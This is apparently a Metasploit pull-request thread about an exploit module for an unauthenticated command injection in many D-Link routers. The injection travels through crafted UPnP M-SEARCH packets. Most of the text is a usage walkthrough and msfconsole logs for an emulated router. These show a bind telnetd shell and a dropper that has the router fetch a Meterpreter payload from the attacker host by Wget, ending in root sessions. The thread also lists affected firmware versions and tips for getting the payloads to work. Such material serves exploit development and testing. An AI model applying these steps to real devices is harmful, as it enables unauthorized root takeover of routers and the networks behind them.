D-Link Router UPnP unauthenticed LAN RCE via a crafted M-SEARCH packet

[h00die-gr3y]

This vulnerability is based on an old theme that was discovered in 2013 by Zach Cutlip and explained in his blog The Shadow File. It is based on the infamous UPnP attack where a command injection vulnerability exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet.
Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform a remote command execution by injecting the payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet.

Ideally, to test this module, you would need a vulnerable D-Link device. However, by downloading the firmware and install and use FirmAE to emulate the router, we can simulate the router and test the vulnerable endpoint.

This module has been tested on:

• FirmAE running on Kali Linux 2023.3

• D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
• D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
• D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
• D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
• D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
• D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
• D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
• D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
• D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
• D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
• D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
• D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
• D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
• D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
• D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
• D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
• D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
• D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
• D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
• D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
• D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
• D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
• D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
• D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
• probably more looking at the scale of impacted devices :-(

Installation steps to emulate the router firmware with FirmAE

• Install FirmAE on your Linux distribution using the installation instructions provided here.
• To emulate the specific firmware that comes with the D-Link devices, binwalk might need to be able to handle a sasquatch filesystem which requires a bit of additional installation and compilation steps that you can find here. Please do not forget to run this after your FirmAE installation otherwise you will not be able to extract the firmware.
• Download the vulnerable firmware from D-Link here. We will pick DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP for the demonstration.
• Start emulation.
• First run ./init.sh to initialize and start the Postgress database.
• Start a debug session ./run.sh -d d-link /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP
• This will take a while, but in the end you should see the following...

[*] /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.47.0 (5-Feb-2023)
e2fsck 1.47.0 (5-Feb-2023)
[*] infer network start!!!

[IID] 25
[MODE] debug
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
[+] Run debug!
Creating TAP device tap25_0...
Set 'tap25_0' persistent and owned by uid 0
Initializing VLAN...
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  import telnetlib
[*] firmware - DIR600B6_FW215WWb02
[*] IP - 192.168.0.1
[*] connecting to netcat (192.168.0.1:31337)
[+] netcat connected
------------------------------
|       FirmAE Debugger      |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

/ # uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
/ # hostname
dlinkrouter
/ #

• You should now be able to ping the network address 192.168.0.1 from your host and run a nmap command to check the services (HTTP TCP port 80 and UPNP UDP port 1900)

# ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
^C
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
# nmap 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
Nmap scan report for 192.168.0.1
Host is up (0.022s latency).
Not shown: 995 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
49152/tcp open  unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
# nmap -sU 192.168.0.1
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT      STATE         SERVICE
53/udp    open          domain
67/udp    open|filtered dhcps
137/udp   open|filtered netbios-ns
1900/udp  open|filtered upnp
5353/udp  open          zeroconf
5355/udp  open|filtered llmnr
19541/udp open|filtered jcp
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1054.98 seconds

You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.

Verification

• Start msfconsole
• use exploit/linux/upnp/dlink_upnp_msearch_exec
• set rhosts <ip-target>
• set rport 1900
• set http_port 80
• set lhost <ip-attacker>
• set target <0=Unix Command, 1=Linux Dropper>
• exploit

you should get a shell or Meterpreter

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > options

Module options (exploit/linux/upnp/dlink_upnp_msearch_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.0.1      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   HTTP_PORT  1900             yes       Universal Plug and Play (UPnP) UDP port
   URIPATH                     no        The URI to use for this exploit (default is random)
   URN        urn:device:1     no        Set URN payload
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/bind_busybox_telnetd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
   LPORT      4444             yes       The listen port
   RHOST      192.168.0.1      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

Scenarios

FirmAE D-Link DIR-865L Router Emulation Unix Command - cmd/unix/bind_busybox_telnetd

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check

[*] Checking if 192.168.0.1:1900 can be exploited.
[*] 192.168.0.1:80 - The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 1 opened (192.168.0.2:42349 -> 192.168.0.1:4444) at 2023-10-17 18:35:36 +0000

Shell Banner:
_!_
-----

# uname -a
uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
# hostname
hostname
dlinkrouter
#

FirmAE D-Link DIR-865L Router Emulation Linux Dropper - linux/mipsle/meterpreter_reverse_tcp

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 1
target => 1
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set payload linux/mipsle/meterpreter_reverse_tcp
payload => linux/mipsle/meterpreter_reverse_tcp
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.0.2:8080/5W7O47FX
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /5W7O47FX
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.1:59600) at 2023-10-17 18:45:12 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > getuid
Server username: root
meterpreter >

Limitations

Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target. Some D-Link devices do not have the wget command so configure echo as cmd-stager flavor with the command set CMDSTAGER::FLAVOR echo.

[cdelafuente-r7]

Thank you @h00die-gr3y for this great module! I just left a few comments and suggestions. I also tested using firmware DIR-865L_REVA_FIRMWARE_1.07.B01 with FirmAE and it works as expected.

So, I found two modules that are exploiting the same vulnerability:

• https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
• https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb

I would prefer not having a new module for this, but, instead, merging the functionalities you added in this PR to the generic dlink_upnp_msearch_exec.rb module. The dlink_dir859_exec_ssdpcgi.rb module could also be merged into the same module and marked as deprecated, since it looks like it targets a firmware that the generic module should also target (this will need to be tested to make sure).

[h00die-gr3y]

Thank you @h00die-gr3y for this great module! I just left a few comments and suggestions. I also tested using firmware DIR-865L_REVA_FIRMWARE_1.07.B01 with FirmAE and it works as expected.

So, I found two modules that are exploiting the same vulnerability:

* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb

* https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb

I would prefer not having a new module for this, but, instead, merging the functionalities you added in this PR to the generic dlink_upnp_msearch_exec.rb module. The dlink_dir859_exec_ssdpcgi.rb module could also be merged into the same module and marked as deprecated, since it looks like it targets a firmware that the generic module should also target (this will need to be tested to make sure).

@cdelafuente-r7 I never updated an existing module. Can you quickly explain how to do this?
Do I need to open a new PR and start editing the existing the module with the additional functionality?

[cdelafuente-r7]

I think you can keep this PR and do all the modifications in your branch. Make all the changes you need to the module files and documentations, remove these two new files you added originally (dlink_msearch_unauth_lan_rce.md and dlink_msearch_unauth_lan_rce.rb), commit when you think it is ready and push to your remote. This PR will update automatically as long as you do all of this in the same branch dlink-upnp-unauth-rce.

Optional: you might want to squash the commits if you want to keep just one commit.

[sempervictus]

Re updating existing modules: this is a very good time to DRY code, move commonly used interfaces into /lib, and clean up impl & api while doing so. Module code can be a bit more rough but the portage to lib generally "imortalizes" and polishes it on the way.

[h00die-gr3y]

Add another target DIR-845L.

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check

[*] Checking if 192.168.0.1:1900 can be exploited.
[*] 192.168.0.1:1900 - The target appears to be vulnerable. Product info: DIR-845L|1.02|N/A|mipsle
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit

[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-845L|1.02|N/A|mipsle
[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
[*] Using URL: http://192.168.0.2:8080/jenmS2
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Client 192.168.0.1 (Wget) requested /jenmS2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 8 opened (192.168.0.2:4444 -> 192.168.0.1:60416) at 2023-11-13 14:41:35 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 4.1.17+)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 8 closed.  Reason: User exit

[*] 192.168.0.1 - Meterpreter session 8 closed.  Reason: Died
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 0
target => 0
msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-845L|1.02|N/A|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 9 opened (192.168.0.2:35327 -> 192.168.0.1:4444) at 2023-11-13 14:42:26 +0000


Shell Banner:
_!_
-----


# uname -a
uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
# 

[cdelafuente-r7]

Thank you @h00die-gr3y for updating this. I left just a few minor comments before it lands. Also, would you mind deprecating the module https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb following this documentation? I believe this one will also target DIR859 firmware?

I was only able to test the DIR-865L_REVA_FIRMWARE_1.07.B01 firmware. It looks like legacyfiles.us.dlink.com is not accessible anymore and I wasn't able to download the DIR-300 and DIR-645 firmwares to make sure it is still compatible with the original module implementation.

[h00die-gr3y]

Thank you @h00die-gr3y for updating this. I left just a few minor comments before it lands. Also, would you mind deprecating the module https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb following this documentation? I believe this one will also target DIR859 firmware?

I was only able to test the DIR-865L_REVA_FIRMWARE_1.07.B01 firmware. It looks like legacyfiles.us.dlink.com is not accessible anymore and I wasn't able to download the DIR-300 and DIR-645 firmwares to make sure it is still compatible with the original module implementation.

Try this link for the DIR-645.
Try this link for DIR-300 rev A.
Try this link for DIR-300 rev B.

Note: busybox telnetd does not work on DIR-300 rev B and staged meterpreter payload fails due to an existing issue 16107 in the payload generation and the stageless payload footprint is too big to run on target. For DIR-300 rev A, busybox telnetd payload fails. RCA still unknown. For meterpreter payloads, I face the same issues as for rev B.

UPDATE: Using this link for DIR-300 and download 2.15 and 2.14 rev B. These versions will at least give you a working busybox telnetd session.

[cdelafuente-r7]

Thanks @h00die-gr3y for updating this. Everything looks good to me. I just updated the deprecation date and message in an additional commit. The date is one year from now and the message is:

msf6 > use linux/upnp/dlink_dir859_exec_ssdpcgi
[*] Using configured payload linux/mipsbe/meterpreter_reverse_tcp

[!] *         The module exploit/linux/upnp/dlink_dir859_exec_ssdpcgi is deprecated!         *
[!] *                   This module will be removed on or about 2024-12-01                   *
[!] *                Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead                *

I'll go ahead and land it. Thanks again for your contribution.

Example outputs

• DIR-865L_REVA_FIRMWARE_1.07.B01

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit verbose=true rhost=192.168.0.1 lhost=192.168.0.2

[+] telnetd -l /bin/sh -p 4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 2 opened (192.168.0.2:41907 -> 192.168.0.1:4444) at 2023-11-20 11:15:54 +0100


Shell Banner:
_!_
-----

• DIR-300_REVB_FIRMWARE_v2.15B01_WW

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit verbose=true rhost=192.168.0.1 lhost=192.168.0.2

[+] telnetd -l /bin/sh -p 4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-300|2.15|Bx|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[-] The connection was refused by the remote host (192.168.0.1:4444).
[*] Command shell session 1 opened (192.168.0.2:45145 -> 192.168.0.1:4444) at 2023-11-20 11:49:49 +0100


Shell Banner:
_!_
-----

• DIR-645_REVA_FIRMWARE_1.03

msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit verbose=true rhost=192.168.0.1 lhost=192.168.0.2

[+] telnetd -l /bin/sh -p 4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:1900 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-645|1.03|N/A|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] Started bind TCP handler against 192.168.0.1:4444
[-] The connection was refused by the remote host (192.168.0.1:4444).
[*] Command shell session 2 opened (192.168.0.2:42303 -> 192.168.0.1:4444) at 2023-11-20 12:18:19 +0100


Shell Banner:
_!_
-----

[cdelafuente-r7]

Release Notes

This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). This module leverages a command injection vulnerability that exists in multiple D-Link network products. This allows an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.